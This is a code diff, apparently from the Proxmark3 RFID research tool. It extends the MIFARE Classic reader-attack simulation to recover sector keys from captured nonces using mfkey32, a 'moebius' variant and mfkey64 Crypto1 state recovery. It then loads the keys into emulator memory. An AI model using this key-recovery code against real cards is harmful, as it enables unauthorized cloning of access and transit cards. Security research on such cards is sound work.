while(! WaitForResponseTimeout(CMD_ACK,&resp,1500)) { while(! WaitForResponseTimeout(CMD_ACK,&resp,1500)) {
@ -1082,61 +1099,79 @@ int CmdHF14AMf1kSim(const char *Cmd)
} }
//got a response //got a response
if (flags & FLAG_NR_AR_ATTACK) { if (flags & FLAG_NR_AR_ATTACK) {
typedef struct { nonces_t ar_resp[ATTACK_KEY_COUNT*2];
uint32_t cuid;
uint8_t sector;
uint8_t keytype;
uint32_t nonce;
uint32_t ar;
uint32_t nr;
uint32_t nonce2;
uint32_t ar2;
uint32_t nr2;
} nonces_t;
nonces_t ar_resp[4];
//uint32_t ar_responses[] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};
uint64_t key = 0; uint64_t key = 0;
//uint64_t keyB = 0;
//uint8_t arnr_len = 8;
memcpy (ar_resp, resp.d.asBytes, sizeof(ar_resp)); memcpy (ar_resp, resp.d.asBytes, sizeof(ar_resp));
typedef struct {
for (uint8_t i = 0; i<4; i++) { uint64_t keyA;
uint32_t security;
uint64_t keyB;
} st_t;
st_t sector_trailer[ATTACK_KEY_COUNT];
memset(sector_trailer, 0x00, sizeof(sector_trailer));
uint8_t stSector[ATTACK_KEY_COUNT];
memset(stSector, 0x00, sizeof(stSector));
uint8_t key_cnt[ATTACK_KEY_COUNT];
memset(key_cnt, 0x00, sizeof(key_cnt));
for (uint8_t i = 0; i<ATTACK_KEY_COUNT; i++) {
if (ar_resp[i].ar2 > 0) { if (ar_resp[i].ar2 > 0) {
key = mfkey32(ar_resp[i].cuid,ar_resp[i].nonce,ar_resp[i].ar,ar_resp[i].nr,ar_resp[i].ar2,ar_resp[i].nr2); //PrintAndLog("Trying sector %d, cuid %08x, nt %08x, ar %08x, nr %08x, ar2 %08x, nr2 %08x",ar_resp[i].sector, ar_resp[i].cuid,ar_resp[i].nonce,ar_resp[i].ar,ar_resp[i].nr,ar_resp[i].ar2,ar_resp[i].nr2);
if (key>0) { if (mfkey32(ar_resp[i], &key)) {
PrintAndLog("\nFound Key%s for sector %d: [%04x%08x]", (i<2) ? "A" : "B", ar_resp[i].sector, (uint32_t) (key>>32), (uint32_t) (key &0xFFFFFFFF)); PrintAndLog("Found Key%s for sector %d: [%04x%08x]", (ar_resp[i].keytype) ? "B" : "A", ar_resp[i].sector, (uint32_t) (key>>32), (uint32_t) (key &0xFFFFFFFF));
//set emulator memory for key
} for (uint8_t ii = 0; ii<ATTACK_KEY_COUNT; ii++) {
} if (key_cnt[ii]==0 || stSector[ii]==ar_resp[i].sector) {
} if (ar_resp[i].keytype==0) {
/* //keyA
if (ar_resp[1] && ar_responses[2] && ar_responses[3] && ar_responses[6] && ar_responses[7]) { sector_trailer[ii].keyA = key;
keyA = mfkey32(ar_responses[0],ar_responses[1],ar_responses[2],ar_responses[3],ar_responses[6],ar_responses[7]); stSector[ii] = ar_resp[i].sector;
if (keyA>0) { key_cnt[ii]++;
PrintAndLog("\nFound KeyA: [%04x%08x]\n\n", (uint32_t) (keyA>>32), (uint32_t) (keyA &0xFFFFFFFF)); break;
//set emulator memory for key } else {
} else { //keyB
keyA = mfkey32(ar_responses[0],ar_responses[1],ar_responses[2],ar_responses[3],ar_responses[6],ar_responses[7]); sector_trailer[ii].keyB = key;
if (keyA>0) { stSector[ii] = ar_resp[i].sector;
PrintAndLog("\nFound KeyA: [%04x%08x]\n\n", (uint32_t) (keyA>>32), (uint32_t) (keyA &0xFFFFFFFF)); key_cnt[ii]++;
//set emulator memory for key break;
}
}
}
} }
} }
} else {
PrintAndLog("keyA response error: %d %d %d %d %d",ar_responses[1] , ar_responses[2] , ar_responses[3] , ar_responses[6] , ar_responses[7]);
} }
if (ar_responses[1] && ar_responses[2+arnr_len] && ar_responses[3+arnr_len] && ar_responses[6+arnr_len] && ar_responses[7+arnr_len]) { //set emulator memory for keys
keyB = mfkey32(ar_responses[0],ar_responses[1],ar_responses[2+arnr_len],ar_responses[3+arnr_len],ar_responses[6+arnr_len],ar_responses[7+arnr_len]); if (setEmulatorMem) {
if (keyB>0) { for (uint8_t i = 0; i<ATTACK_KEY_COUNT; i++) {
PrintAndLog("\nFound KeyB: [%04x%08x]\n\n", (uint32_t) (keyB>>32), (uint32_t) (keyB & 0xFFFFFFFF)); if (key_cnt[i]>0) {
//set emulator memory for key //PrintAndLog ("block %d, keyA:%04x%08x, keyb:%04x%08x",stSector[i]*4+3, (uint32_t) (sector_trailer[i].keyA>>32), (uint32_t) (sector_trailer[i].keyA &0xFFFFFFFF),(uint32_t) (sector_trailer[i].keyB>>32), (uint32_t) (sector_trailer[i].keyB &0xFFFFFFFF));
uint8_t memBlock[16];
memset(memBlock, 0x00, sizeof(memBlock));
char cmd1[36];
memset(cmd1,0x00,sizeof(cmd1));
snprintf(cmd1,sizeof(cmd1),"%04x%08xFF078069%04x%08x",(uint32_t) (sector_trailer[i].keyA>>32), (uint32_t) (sector_trailer[i].keyA &0xFFFFFFFF),(uint32_t) (sector_trailer[i].keyB>>32), (uint32_t) (sector_trailer[i].keyB &0xFFFFFFFF));
//PrintAndLog("%s",cmd1);
if (param_gethex(cmd1, 0, memBlock, 32)) {
PrintAndLog("block data must include 32 HEX symbols");
return 1;
}
UsbCommand c = {CMD_MIFARE_EML_MEMSET, {(stSector[i]*4+3), 1, 0}};
memcpy(c.d.asBytes, memBlock, 16);
clearCommandBuffer();
SendCommand(&c);
}
} }
} }
if (keyA || keyB) { //moebius attack
//TODO retry sim with new keys in emulator memory? (somehow flag to check that to see if new key has successful auth now?) for (uint8_t i = ATTACK_KEY_COUNT; i<ATTACK_KEY_COUNT*2; i++) {
// to validate key is correct if (ar_resp[i].ar2 > 0) {
if (tryMfk32_moebius(ar_resp[i], &key)) {
PrintAndLog("M-Found Key%s for sector %d: [%04x%08x]", (ar_resp[i].keytype) ? "B" : "A", ar_resp[i].sector, (uint32_t) (key>>32), (uint32_t) (key &0xFFFFFFFF));
}
}
} }
*/
} }
} }

View file

@ -151,22 +151,24 @@ int nonce2key(uint32_t uid, uint32_t nt, uint32_t nr, uint64_t par_info, uint64_
} }
// 32 bit recover key from 2 nonces // 32 bit recover key from 2 nonces
uint64_t mfkey32(uint32_t uid, uint32_t nt, uint32_t nr0_enc, uint32_t ar0_enc, uint32_t nr1_enc, uint32_t ar1_enc) { bool mfkey32(nonces_t data, uint64_t *outputkey) {
struct Crypto1State *s,*t; struct Crypto1State *s,*t;
uint64_t outkey = 0;
uint64_t key=0; // recovered key uint64_t key=0; // recovered key
/*uint32_t uid; // serial number uint32_t uid = data.cuid;
uint32_t nt; // tag challenge uint32_t nt = data.nonce; // first tag challenge (nonce)
uint32_t nr0_enc; // first encrypted reader challenge uint32_t nr0_enc = data.nr; // first encrypted reader challenge
uint32_t ar0_enc; // first encrypted reader response uint32_t ar0_enc = data.ar; // first encrypted reader response
uint32_t nr1_enc; // second encrypted reader challenge uint32_t nr1_enc = data.nr2; // second encrypted reader challenge
uint32_t ar1_enc; // second encrypted reader response uint32_t ar1_enc = data.ar2; // second encrypted reader response
*/ clock_t t1 = clock();
uint8_t found=0; bool isSuccess = FALSE;
//uint32_t ks2; // keystream used to encrypt reader response uint8_t counter=0;
//PrintAndLog("Enter mfkey32");
//PrintAndLog("Trying sector %d, cuid %08x, nt %08x, nr %08x, ar %08x, nr2 %08x, ar2 %08x",data.sector, uid, nt,nr0_enc,ar0_enc,nr1_enc,ar1_enc);
// Generate lfsr succesors of the tag challenge // Generate lfsr succesors of the tag challenge
prng_successor(nt, 64); //prng_successor(nt, 64);
prng_successor(nt, 96); //prng_successor(nt, 96);
// Extract the keystream from the messages // Extract the keystream from the messages
//ks2 = ar0_enc ^ prng_successor(nt, 64); //ks2 = ar0_enc ^ prng_successor(nt, 64);
@ -181,13 +183,112 @@ uint64_t mfkey32(uint32_t uid, uint32_t nt, uint32_t nr0_enc, uint32_t ar0_enc,
crypto1_word(t, uid ^ nt, 0); crypto1_word(t, uid ^ nt, 0);
crypto1_word(t, nr1_enc, 1); crypto1_word(t, nr1_enc, 1);
if (ar1_enc == (crypto1_word(t, 0, 0) ^ prng_successor(nt, 64))) { if (ar1_enc == (crypto1_word(t, 0, 0) ^ prng_successor(nt, 64))) {
//printf("\nFound Key: [%012"llx"]\n\n",key); //PrintAndLog("Found Key: [%012"llx"]",key);
found = 1; outkey = key;
break; counter++;
if (counter==20) break;
} }
} }
free(s); //free(s);
isSuccess = (counter == 1);
t1 = clock() - t1;
//if ( t1 > 0 ) PrintAndLog("Time in mfkey32: %.0f ticks \nFound %d possible keys", (float)t1, counter);
*outputkey = ( isSuccess ) ? outkey : 0;
crypto1_destroy(s);
FILE *fout;
if ((fout = fopen("stats.txt","ab")) == NULL) {
PrintAndLog("Could not create file name stats.txt");
return 1;
}
fprintf(fout, "mfkey32,%d,%d,%s,%04x%08x,%.0Lf\r\n",counter,data.sector,(data.keytype) ? "B" : "A", (uint32_t)(outkey>>32) & 0xFFFF,(uint32_t)(outkey&0xFFFFFFFF),(long double)t1);
fclose(fout);
return isSuccess;
}
if (found) return key; bool tryMfk32_moebius(nonces_t data, uint64_t *outputkey) {
struct Crypto1State *s, *t;
uint64_t outkey = 0;
uint64_t key = 0; // recovered key
uint32_t uid = data.cuid;
uint32_t nt0 = data.nonce; // first tag challenge (nonce)
uint32_t nr0_enc = data.nr; // first encrypted reader challenge
uint32_t ar0_enc = data.ar; // first encrypted reader response
//uint32_t uid1 = le32toh(data+16);
uint32_t nt1 = data.nonce2; // second tag challenge (nonce)
uint32_t nr1_enc = data.nr2; // second encrypted reader challenge
uint32_t ar1_enc = data.ar2; // second encrypted reader response
bool isSuccess = FALSE;
int counter = 0;
//PrintAndLog("Enter mfkey32_moebius");
clock_t t1 = clock();
s = lfsr_recovery32(ar0_enc ^ prng_successor(nt0, 64), 0);
for(t = s; t->odd | t->even; ++t) {
lfsr_rollback_word(t, 0, 0);
lfsr_rollback_word(t, nr0_enc, 1);
lfsr_rollback_word(t, uid ^ nt0, 0);
crypto1_get_lfsr(t, &key);
crypto1_word(t, uid ^ nt1, 0);
crypto1_word(t, nr1_enc, 1);
if (ar1_enc == (crypto1_word(t, 0, 0) ^ prng_successor(nt1, 64))) {
//PrintAndLog("Found Key: [%012"llx"]",key);
outkey=key;
++counter;
if (counter==20)
break;
}
}
isSuccess = (counter == 1);
t1 = clock() - t1;
//if ( t1 > 0 ) PrintAndLog("Time in mfkey32_moebius: %.0f ticks \nFound %d possible keys", (float)t1,counter);
*outputkey = ( isSuccess ) ? outkey : 0;
crypto1_destroy(s);
FILE *fout;
if ((fout = fopen("stats.txt","ab")) == NULL) {
PrintAndLog("Could not create file name stats.txt");
return 1;
}
fprintf(fout, "moebius,%d,%d,%s,%04x%08x,%0.Lf\r\n",counter,data.sector, (data.keytype) ? "B" : "A", (uint32_t) (outkey>>32),(uint32_t)(outkey&0xFFFFFFFF),(long double)t1);
fclose(fout);
return isSuccess;
}
int tryMfk64_ex(uint8_t *data, uint64_t *outputkey){
uint32_t uid = le32toh(data);
uint32_t nt = le32toh(data+4); // tag challenge
uint32_t nr_enc = le32toh(data+8); // encrypted reader challenge
uint32_t ar_enc = le32toh(data+12); // encrypted reader response
uint32_t at_enc = le32toh(data+16); // encrypted tag response
return tryMfk64(uid, nt, nr_enc, ar_enc, at_enc, outputkey);
}
int tryMfk64(uint32_t uid, uint32_t nt, uint32_t nr_enc, uint32_t ar_enc, uint32_t at_enc, uint64_t *outputkey){
uint64_t key = 0; // recovered key
uint32_t ks2; // keystream used to encrypt reader response
uint32_t ks3; // keystream used to encrypt tag response
struct Crypto1State *revstate;
PrintAndLog("Enter mfkey64");
clock_t t1 = clock();
// Extract the keystream from the messages
ks2 = ar_enc ^ prng_successor(nt, 64);
ks3 = at_enc ^ prng_successor(nt, 96);
revstate = lfsr_recovery64(ks2, ks3);
lfsr_rollback_word(revstate, 0, 0);
lfsr_rollback_word(revstate, 0, 0);
lfsr_rollback_word(revstate, nr_enc, 1);
lfsr_rollback_word(revstate, uid ^ nt, 0);
crypto1_get_lfsr(revstate, &key);
PrintAndLog("Found Key: [%012"llx"]", key);
crypto1_destroy(revstate);
*outputkey = key;
t1 = clock() - t1;
if ( t1 > 0 ) PrintAndLog("Time in mfkey64: %.0f ticks \n", (float)t1);
return 0; return 0;
} }

View file

@ -17,8 +17,26 @@
#include <stdlib.h> #include <stdlib.h>
#include "crapto1.h" #include "crapto1.h"
#include "common.h" #include "common.h"
//#include <stdbool.h> //for bool
typedef struct {
uint32_t cuid;
uint8_t sector;
uint8_t keytype;
uint32_t nonce;
uint32_t ar;
uint32_t nr;
uint32_t nonce2;
uint32_t ar2;
uint32_t nr2;
} nonces_t;
int nonce2key(uint32_t uid, uint32_t nt, uint32_t nr, uint64_t par_info, uint64_t ks_info, uint64_t * key); int nonce2key(uint32_t uid, uint32_t nt, uint32_t nr, uint64_t par_info, uint64_t ks_info, uint64_t * key);
uint64_t mfkey32(uint32_t uid, uint32_t nt, uint32_t nr0_enc, uint32_t ar0_enc, uint32_t nr1_enc, uint32_t ar1_enc); bool mfkey32(nonces_t data, uint64_t *outputkey);
bool tryMfk32_moebius(nonces_t data, uint64_t *outputkey);
int tryMfk64_ex(uint8_t *data, uint64_t *outputkey);
int tryMfk64(uint32_t uid, uint32_t nt, uint32_t nr_enc, uint32_t ar_enc, uint32_t at_enc, uint64_t *outputkey);
//uint64_t mfkey32(uint32_t uid, uint32_t nt, uint32_t nr0_enc, uint32_t ar0_enc, uint32_t nr1_enc, uint32_t ar1_enc);
#endif #endif

View file

@ -498,6 +498,9 @@ void xor(unsigned char *dst, unsigned char *src, size_t len) {
int32_t le24toh (uint8_t data[3]) { int32_t le24toh (uint8_t data[3]) {
return (data[2] << 16) | (data[1] << 8) | data[0]; return (data[2] << 16) | (data[1] << 8) | data[0];
} }
uint32_t le32toh (uint8_t *data) {
return (uint32_t)( (data[3]<<24) | (data[2]<<16) | (data[1]<<8) | data[0]);
}
// RotateLeft - Ultralight, Desfire, works on byte level // RotateLeft - Ultralight, Desfire, works on byte level
// 00-01-02 >> 01-02-00 // 00-01-02 >> 01-02-00

View file

@ -70,4 +70,5 @@ void wiegand_add_parity(uint8_t *target, uint8_t *source, uint8_t length);
void xor(unsigned char *dst, unsigned char *src, size_t len); void xor(unsigned char *dst, unsigned char *src, size_t len);
int32_t le24toh(uint8_t data[3]); int32_t le24toh(uint8_t data[3]);
uint32_t le32toh (uint8_t *data);
void rol(uint8_t *data, const size_t len); void rol(uint8_t *data, const size_t len);

View file

@ -109,20 +109,25 @@ NXP/Philips CUSTOM COMMANDS
#define ISO14443A_CMD_WUPA 0x52 #define ISO14443A_CMD_WUPA 0x52
#define ISO14443A_CMD_ANTICOLL_OR_SELECT 0x93 #define ISO14443A_CMD_ANTICOLL_OR_SELECT 0x93
#define ISO14443A_CMD_ANTICOLL_OR_SELECT_2 0x95 #define ISO14443A_CMD_ANTICOLL_OR_SELECT_2 0x95
#define ISO14443A_CMD_ANTICOLL_OR_SELECT_3 0x97
#define ISO14443A_CMD_WRITEBLOCK 0xA0 // or 0xA2 ? #define ISO14443A_CMD_WRITEBLOCK 0xA0 // or 0xA2 ?
#define ISO14443A_CMD_HALT 0x50 #define ISO14443A_CMD_HALT 0x50
#define ISO14443A_CMD_RATS 0xE0 #define ISO14443A_CMD_RATS 0xE0
#define MIFARE_AUTH_KEYA 0x60 #define MIFARE_AUTH_KEYA 0x60
#define MIFARE_AUTH_KEYB 0x61 #define MIFARE_AUTH_KEYB 0x61
#define MIFARE_MAGICWUPC1 0x40 #define MIFARE_MAGICWUPC1 0x40
#define MIFARE_MAGICWUPC2 0x43 #define MIFARE_MAGICWUPC2 0x43
#define MIFARE_MAGICWIPEC 0x41 #define MIFARE_MAGICWIPEC 0x41
#define MIFARE_CMD_INC 0xC0 #define MIFARE_CMD_INC 0xC0
#define MIFARE_CMD_DEC 0xC1 #define MIFARE_CMD_DEC 0xC1
#define MIFARE_CMD_RESTORE 0xC2 #define MIFARE_CMD_RESTORE 0xC2
#define MIFARE_CMD_TRANSFER 0xB0 #define MIFARE_CMD_TRANSFER 0xB0
#define MIFARE_EV1_PERSONAL_UID 0x40
#define MIFARE_EV1_SETMODE 0x43
#define MIFARE_ULC_WRITE 0xA2 #define MIFARE_ULC_WRITE 0xA2
//#define MIFARE_ULC__COMP_WRITE 0xA0 //#define MIFARE_ULC__COMP_WRITE 0xA0
#define MIFARE_ULC_AUTH_1 0x1A #define MIFARE_ULC_AUTH_1 0x1A

View file

@ -212,10 +212,11 @@ typedef struct{
//Mifare simulation flags //Mifare simulation flags
#define FLAG_INTERACTIVE 0x01 #define FLAG_INTERACTIVE 0x01
#define FLAG_4B_UID_IN_DATA 0x02 #define FLAG_4B_UID_IN_DATA 0x02
#define FLAG_7B_UID_IN_DATA 0x04 #define FLAG_7B_UID_IN_DATA 0x04
#define FLAG_NR_AR_ATTACK 0x08 #define FLAG_10B_UID_IN_DATA 0x08
#define FLAG_NR_AR_ATTACK 0x10
//Iclass reader flags //Iclass reader flags